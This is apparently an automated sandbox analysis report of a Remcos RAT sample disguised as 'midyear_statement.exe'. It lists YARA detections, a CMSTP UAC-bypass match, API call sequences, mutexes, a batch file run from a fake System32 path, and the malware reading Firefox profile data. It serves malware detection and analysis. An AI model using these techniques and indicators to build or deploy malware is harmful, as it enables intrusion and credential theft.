Source: 31.2.wkrriuhD.pif.24140000.2.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 31.2.wkrriuhD.pif.24140000.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 24.2.wkrriuhD.pif.12330000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 24.2.wkrriuhD.pif.12330000.2.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 24.2.wkrriuhD.pif.12330000.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 24.2.wkrriuhD.pif.12330000.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 24.2.wkrriuhD.pif.12330000.2.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 24.2.wkrriuhD.pif.12330000.2.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 31.2.wkrriuhD.pif.24140000.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 31.2.wkrriuhD.pif.24140000.2.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 31.2.wkrriuhD.pif.24140000.2.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 31.2.wkrriuhD.pif.5919e2.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 31.2.wkrriuhD.pif.5919e2.0.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 31.2.wkrriuhD.pif.5919e2.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 24.2.wkrriuhD.pif.590000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 24.2.wkrriuhD.pif.590000.0.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 24.2.wkrriuhD.pif.590000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 31.2.wkrriuhD.pif.590000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 31.2.wkrriuhD.pif.590000.1.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 31.2.wkrriuhD.pif.590000.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 33.2.wkrriuhD.pif.4f0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 33.2.wkrriuhD.pif.4f0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 33.2.wkrriuhD.pif.4f0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 24.2.wkrriuhD.pif.590000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 24.2.wkrriuhD.pif.590000.0.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 24.2.wkrriuhD.pif.590000.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 33.2.wkrriuhD.pif.4f0000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 33.2.wkrriuhD.pif.4f0000.0.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 33.2.wkrriuhD.pif.4f0000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 00000018.00000002.3664441036.0000000012330000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 00000018.00000002.3664441036.0000000012330000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 00000018.00000002.3664441036.0000000012330000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 00000021.00000002.1638276893.0000000000590000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 00000021.00000002.1638276893.0000000000590000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 00000021.00000002.1638276893.0000000000590000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 0000001F.00000002.1589395937.0000000024140000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 0000001F.00000002.1589395937.0000000024140000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 0000001F.00000002.1589395937.0000000024140000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 00000018.00000002.3646905411.0000000000590000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 00000018.00000002.3646905411.0000000000590000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 00000018.00000002.3646905411.0000000000590000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 00000021.00000002.1638093919.00000000004F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 00000021.00000002.1638093919.00000000004F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 00000021.00000002.1638093919.00000000004F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 0000001F.00000002.1566851721.0000000000590000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 0000001F.00000002.1566851721.0000000000590000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 0000001F.00000002.1566851721.0000000000590000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: Process Memory Space: wkrriuhD.pif PID: 7896, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: Process Memory Space: wkrriuhD.pif PID: 7860, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: Process Memory Space: wkrriuhD.pif PID: 1652, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23

Source: classification engine

Classification label: mal100.rans.phis.troj.spyw.expl.evad.winEXE@39/16@7/3

Source: C:\Users\Public\Libraries\wkrriuhD.pif

Code function: 27_2_004182CE GetLastError,FormatMessageW,FormatMessageA,LocalFree,??3@YAXPAX@Z,

27_2_004182CE

Source: C:\Users\Public\Libraries\wkrriuhD.pif

Code function: 24_2_12347952 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,

24_2_12347952

Source: C:\Users\user\Desktop\midyear_statement.exe

Code function: 0_2_040A7F18 GetDiskFreeSpaceA,

0_2_040A7F18

Source: C:\Users\Public\Libraries\wkrriuhD.pif

Code function: 24_2_1233F474 GetModuleFileNameW,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,CloseHandle,

24_2_1233F474

Source: C:\Users\user\Desktop\midyear_statement.exe

Code function: 0_2_040B6D0C CoCreateInstance,

0_2_040B6D0C

Source: C:\Users\Public\Libraries\wkrriuhD.pif

Code function: 24_2_1234B4A8 FindResourceA,LoadResource,LockResource,SizeofResource,

24_2_1234B4A8

Source: C:\Users\Public\Libraries\wkrriuhD.pif

Code function: 24_2_1234AA4A OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,

24_2_1234AA4A

Source: C:\Users\user\Desktop\midyear_statement.exe

File created: C:\Users\Public\Libraries\Null

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7648:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7596:120:WilError_03
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Mutant created: \Sessions\1\BaseNamedObjects\Rmc-W5UGP5
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7132:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7528:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5900:120:WilError_03

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cciqjdho.kwp.ps1

Jump to behavior

Source: C:\Windows \System32\2506803.exe

Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\windows \system32\KDECO.bat""

Source: C:\Users\Public\Libraries\wkrriuhD.pif	Command line argument: PG	24_2_0059F7A7
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Command line argument: PG	24_2_0059F7A7
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Command line argument: PG	24_2_0059F7A7
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Command line argument: PG	24_2_0059F7A7
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Command line argument: PG	24_2_0059F7A7
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Command line argument: 8SG	24_2_0059F7A7
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Command line argument: PG	24_2_0059F7A7
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Command line argument: 8SG	24_2_0059F7A7
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Command line argument: PG	24_2_0059F7A7
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Command line argument: PG	24_2_0059F7A7
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Command line argument: PG	24_2_0059F7A7
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Command line argument: PG	24_2_0059F7A7
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Command line argument: PG	24_2_0059F7A7
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Command line argument: PG	24_2_0059F7A7
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Command line argument: PG	24_2_0059F7A7
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Command line argument: dMG	24_2_0059F7A7
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Command line argument: PG	24_2_0059F7A7
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Command line argument: PG	24_2_0059F7A7
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Command line argument: PSG	24_2_0059F7A7

Source: C:\Users\user\Desktop\midyear_statement.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\Public\Libraries\Dhuirrkw.PIF	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\Public\Libraries\Dhuirrkw.PIF	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\Public\Libraries\Dhuirrkw.PIF	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\Public\Libraries\Dhuirrkw.PIF	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales

Source: C:\Users\Public\Libraries\wkrriuhD.pif

System information queried: HandleInformation

Jump to behavior

Source: C:\Users\Public\Libraries\wkrriuhD.pif

File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini

Jump to behavior

Source: C:\Users\user\Desktop\midyear_statement.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: wkrriuhD.pif, wkrriuhD.pif, 0000001B.00000002.1406156009.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Binary or memory string: SELECT 'INSERT INTO vacuum_db.' \|\| quote(name) \|\| ' SELECT * FROM main.' \|\| quote(name) \|\| ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
Source: wkrriuhD.pif, wkrriuhD.pif, 0000001C.00000002.1384508766.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: wkrriuhD.pif, 00000018.00000002.3665263923.0000000014530000.00000040.10000000.00040000.00000000.sdmp, wkrriuhD.pif, 0000001B.00000002.1406156009.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
Source: wkrriuhD.pif, wkrriuhD.pif, 0000001B.00000002.1406156009.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Binary or memory string: SELECT 'INSERT INTO vacuum_db.' \|\| quote(name) \|\| ' SELECT * FROM main.' \|\| quote(name) \|\| ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
Source: wkrriuhD.pif, wkrriuhD.pif, 0000001B.00000002.1406156009.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
